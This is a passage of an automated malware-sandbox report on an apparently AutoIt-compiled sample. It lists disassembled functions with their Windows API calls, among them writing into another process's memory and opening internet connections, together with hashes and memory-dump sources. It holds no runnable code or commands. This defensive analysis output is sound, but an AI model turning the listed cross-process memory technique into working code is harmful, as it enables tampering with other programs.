                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            • Opcode ID: 98ac713c285b9814fd4d42376cbc86081e3c7ca72aa2979231c96eedce73b97d
                                                            • Instruction ID: 77895091b86acc2a98923e802250f41a7cc80236ae6d56f99c37dbcab7a9b246
                                                            • Opcode Fuzzy Hash: 98ac713c285b9814fd4d42376cbc86081e3c7ca72aa2979231c96eedce73b97d
                                                            • Instruction Fuzzy Hash: C15137714187449BD320EF10DC86BAFBBE8FB85344F41885EF2D8812A1EB318569DB66
                                                            Function 00D39734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD4F0B: __fread_nolock.LIBCMT ref: 00CD4F29
                                                            • _wcscmp.LIBCMT ref: 00D39824
                                                            • _wcscmp.LIBCMT ref: 00D39837
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$__fread_nolock
                                                            • String ID: FILE
                                                            • API String ID: 4029003684-3121273764
                                                            • Opcode ID: aa194f7115b8a40ea71bf984428d34106d871c551b9bc0ac1f85604c3bd6dc87
                                                            • Instruction ID: 3520adc7aa61c30c6304d327ba46f12873c452644917a2e8a0025bc9a80046da
                                                            • Opcode Fuzzy Hash: aa194f7115b8a40ea71bf984428d34106d871c551b9bc0ac1f85604c3bd6dc87
                                                            • Instruction Fuzzy Hash: 5341A571A00209BBDF249BE0CC55FEFBBB9DF85710F00046AFA04A7291DAB199049B61
                                                            Function 00D4258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D4259E
                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00D425D4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CrackInternet_memset
                                                            • String ID: |
                                                            • API String ID: 1413715105-2343686810
                                                            • Opcode ID: 9c9c1a1bae1f215702e01b0e1e22a4f8547696412741d356e76a5f3e0befe224
                                                            • Instruction ID: e523b70ebde32b6a381ce4d039adb1d599f177a60c4e5531f8fd7d288198cf54
                                                            • Opcode Fuzzy Hash: 9c9c1a1bae1f215702e01b0e1e22a4f8547696412741d356e76a5f3e0befe224
                                                            • Instruction Fuzzy Hash: A8310871801119ABCF11EFA4CC85EEEBFB9FF08354F10015AFA15A6262EB319956DB60
                                                            Function 00D57A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00D57B61
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00D57B76
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: '
                                                            • API String ID: 3850602802-1997036262
                                                            • Opcode ID: 74074ff609a62b6036fc72a0bec1e923e9c4e72279b4ad49cad730d61ccaa19a
                                                            • Instruction ID: 5b8e9fe23baa789b8eb2d24babc7bbda12140173cf885cb1391f1f61c6e105f5
                                                            • Opcode Fuzzy Hash: 74074ff609a62b6036fc72a0bec1e923e9c4e72279b4ad49cad730d61ccaa19a
                                                            • Instruction Fuzzy Hash: 5941D674A053099FDF14CF65D981BDABBB5FB08301F24016AED08AB355D770AA55CFA0
                                                            Function 00D56A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00D56B17
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00D56B53
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$DestroyMove
                                                            • String ID: static
                                                            • API String ID: 2139405536-2160076837
                                                            • Opcode ID: 342ecbb6a3687c20397abd18bb8247548aae312c8e2421147311d59085296c1e
                                                            • Instruction ID: f2424d8729ecfc6c07d7adfc4cf5f04fbda7e38d266be701d2aca451aae0cb64
                                                            • Opcode Fuzzy Hash: 342ecbb6a3687c20397abd18bb8247548aae312c8e2421147311d59085296c1e
                                                            • Instruction Fuzzy Hash: F6318C71200604AEDF109F64CC80ABB77A9FF48761F54861AFDA9D7290DA30EC85DB70
                                                            Function 00D2994C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00D29965
                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00D2999F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: @U=u
                                                            • API String ID: 3850602802-2594219639
                                                            • Opcode ID: d873f0eee0a16deedcbdfb8d3310dfd7b5f585c316f4abb93ec19e43e13c9980
                                                            • Instruction ID: 6de998fcbb872c1dc6fc02167996a0070dbc60c702e57e785df4796edbc74049
                                                            • Opcode Fuzzy Hash: d873f0eee0a16deedcbdfb8d3310dfd7b5f585c316f4abb93ec19e43e13c9980
                                                            • Instruction Fuzzy Hash: 3B21D732D00315ABCF10EBA8D891DBEF7B9EF98714F04416AFA15A7390EA719C418B70
                                                            Function 00D328A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D32911
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00D3294C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: 6d2167454a9282d43c48476b4eca88b793f8c676c9d731b79741288fb4778410
                                                            • Instruction ID: 4b844b7a4883a0f27f6e0f06360840385e668008961f44540b5804602dc64bad
                                                            • Opcode Fuzzy Hash: 6d2167454a9282d43c48476b4eca88b793f8c676c9d731b79741288fb4778410
                                                            • Instruction Fuzzy Hash: D8318F31E403099BEB29CF58DD85BBEBBA8EF45350F180029E985A61A1D7709944DF71
                                                            Function 00D439E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __snwprintf.LIBCMT ref: 00D43A66
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __snwprintf_memmove
                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                            • API String ID: 3506404897-2584243854
                                                            • Opcode ID: 4cd1081cee68f9bfce9c567536936b78188bff5abf57b56f196ea0f60f98298c
                                                            • Instruction ID: 5ffb31a92da45dc29d4d922ed803f5c0ecdbc41cb2c0b557c059ac524c76923d
                                                            • Opcode Fuzzy Hash: 4cd1081cee68f9bfce9c567536936b78188bff5abf57b56f196ea0f60f98298c
                                                            • Instruction Fuzzy Hash: 46218031640219AFCF11EF68CC82EAE77B5EF44700F540455F945AB281DB30EA45EBB1
                                                            Function 00D2A9B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CE603A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00CE6051
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00D2AA10
                                                            • _strlen.LIBCMT ref: 00D2AA1B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Timeout_strlen
                                                            • String ID: @U=u
                                                            • API String ID: 2777139624-2594219639
                                                            • Opcode ID: 95917a8deedb64848f597f1b3f928ae0ef596daa81c67eb358c7702ca09e2875
                                                            • Instruction ID: 9e5ba8e55cd8ce29e1d5d0842c03daea28e3560a3f5b5455eaba68e08ef4dedf
                                                            • Opcode Fuzzy Hash: 95917a8deedb64848f597f1b3f928ae0ef596daa81c67eb358c7702ca09e2875
                                                            • Instruction Fuzzy Hash: 5C1105326002156BCF14BE7CED829BE7BA9CF65708F10002EFA06CB193DD259945D672
                                                            Function 00D56865 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D355FD: GetLocalTime.KERNEL32 ref: 00D3560A
                                                              • Part of subcall function 00D355FD: _wcsncpy.LIBCMT ref: 00D3563F
                                                              • Part of subcall function 00D355FD: _wcsncpy.LIBCMT ref: 00D35671
                                                              • Part of subcall function 00D355FD: _wcsncpy.LIBCMT ref: 00D356A4
                                                              • Part of subcall function 00D355FD: _wcsncpy.LIBCMT ref: 00D356E6
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D568FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _wcsncpy$LocalMessageSendTime
                                                            • String ID: @U=u$SysDateTimePick32
                                                            • API String ID: 2466184910-2530228043
                                                            • Opcode ID: 7dbe27ca8baa90e89a37b706f66d5fafda1349904710470b423144648c922483
                                                            • Instruction ID: 6725512b79f8ec92ebb2bb0365fc719f9a751eeb74905cc1fdc7fe3503c7d265
                                                            • Opcode Fuzzy Hash: 7dbe27ca8baa90e89a37b706f66d5fafda1349904710470b423144648c922483
                                                            • Instruction Fuzzy Hash: B02106713402086FEF219E54DC82FEE77AAEB44761F680519FD90AB2D0D6B1EC849B70
                                                            Function 00D29225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D2923E
                                                              • Part of subcall function 00D313DE: GetWindowThreadProcessId.USER32(?,?), ref: 00D31409
                                                              • Part of subcall function 00D313DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00D2925A,00000034,?,?,00001004,00000000,00000000), ref: 00D31419
                                                              • Part of subcall function 00D313DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00D2925A,00000034,?,?,00001004,00000000,00000000), ref: 00D3142F
                                                              • Part of subcall function 00D314BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D29296,?,?,00000034,00000800,?,00000034), ref: 00D314E6
                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00D292A5
                                                              • Part of subcall function 00D31487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D292C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00D314B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @U=u
                                                            • API String ID: 1045663743-2594219639
                                                            • Opcode ID: cf5276f15d027e7b8467ecf86b98d38e59b2b406f0f75ea4bb4e98c19cb2954c
                                                            • Instruction ID: 3e487e392fb49005f8b333b09a99725b99307c288e60bac1e4eb126d686b2658
                                                            • Opcode Fuzzy Hash: cf5276f15d027e7b8467ecf86b98d38e59b2b406f0f75ea4bb4e98c19cb2954c
                                                            • Instruction Fuzzy Hash: E2219035902229EBEF21DBA4DC81FDDBBB8FF19350F1001A5F948A7190DA715A44DBA4
                                                            Function 00D566D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D56761
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D5676C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            • Opcode ID: 80ca3026ab54f6a5c76ac67af05abd5b78a17a9f8cdd745fef3d20ae1d71e068
                                                            • Instruction ID: d6ce95ec449955291435e5b09a83517b35db4a8ee5af22cad75f201a6ad2a4b4
                                                            • Opcode Fuzzy Hash: 80ca3026ab54f6a5c76ac67af05abd5b78a17a9f8cdd745fef3d20ae1d71e068
                                                            • Instruction Fuzzy Hash: 5F11B271200208AFEF259F54CC80EBB3B6AEB4836AF540229FD1497290D631DC5587B0
                                                            Function 00D596F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @U=u
                                                            • API String ID: 0-2594219639
                                                            • Opcode ID: 36b4f6946318a0812609fb8933fde989be07f1a9a17a1b2164fcf2f41728ce6a
                                                            • Instruction ID: a2fed9f07bcfbe2d31f706c884a26d597a8d669858743f9edbf1ac3557de5428
                                                            • Opcode Fuzzy Hash: 36b4f6946318a0812609fb8933fde989be07f1a9a17a1b2164fcf2f41728ce6a
                                                            • Instruction Fuzzy Hash: 4F215C35124208FFEF118F64CC65FBAB7A4EB09312F444166FE56DA1E0D671EA189B70
                                                            Function 00D56C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CD1D73
                                                              • Part of subcall function 00CD1D35: GetStockObject.GDI32(00000011), ref: 00CD1D87
                                                              • Part of subcall function 00CD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00CD1D91
                                                            • GetWindowRect.USER32(00000000,?), ref: 00D56C71
                                                            • GetSysColor.USER32(00000012), ref: 00D56C8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
                                                            • Opcode ID: 6c95e7eb78232f5b79445a9a1aad6ef70e62742248a6bf45ffba3e5940ed8bf7
                                                            • Instruction ID: cfd2fc43a49b585c3ba7372516331a085eb8743620cceee23d4a9275b1400358
                                                            • Opcode Fuzzy Hash: 6c95e7eb78232f5b79445a9a1aad6ef70e62742248a6bf45ffba3e5940ed8bf7
                                                            • Instruction Fuzzy Hash: 85212672610209AFDF04DFA8CC45AFA7BA9FB08316F044629FD95D3250E735E854DB60
                                                            Function 00D329AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D32A22
                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00D32A41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: d93cef41e31982e300296de88e42fed21afb54f50a11f6f2c9fbf221609a4652
                                                            • Instruction ID: 6faa357e8b5fc2eb1cb591b6316cecdbd954136789279f69d0cffb4e25022373
                                                            • Opcode Fuzzy Hash: d93cef41e31982e300296de88e42fed21afb54f50a11f6f2c9fbf221609a4652
                                                            • Instruction Fuzzy Hash: 1D11C432D01214ABDF31DF98DC44BBA77B8AB45310F284022E995E72A0D770ED0AC7B1
                                                            Function 00D421D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00D4222C
                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00D42255
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Internet$OpenOption
                                                            • String ID: <local>
                                                            • API String ID: 942729171-4266983199
                                                            • Opcode ID: 090c5908798b343177e4d360b4b36404fe2aa1ab6e1f7a1231596407a3c7fcb1
                                                            • Instruction ID: 20b03d08f678fe83c78a7f28426152bdc8952b24ea7ee5740885c2a40ec500ab
                                                            • Opcode Fuzzy Hash: 090c5908798b343177e4d360b4b36404fe2aa1ab6e1f7a1231596407a3c7fcb1
                                                            • Instruction Fuzzy Hash: E8110E70501325BBDB248F118CC8FBBFBA8FF0A352F90822AFA4586100D2B09980D6F0
                                                            Function 00D584E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,?,?,?), ref: 00D58530
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
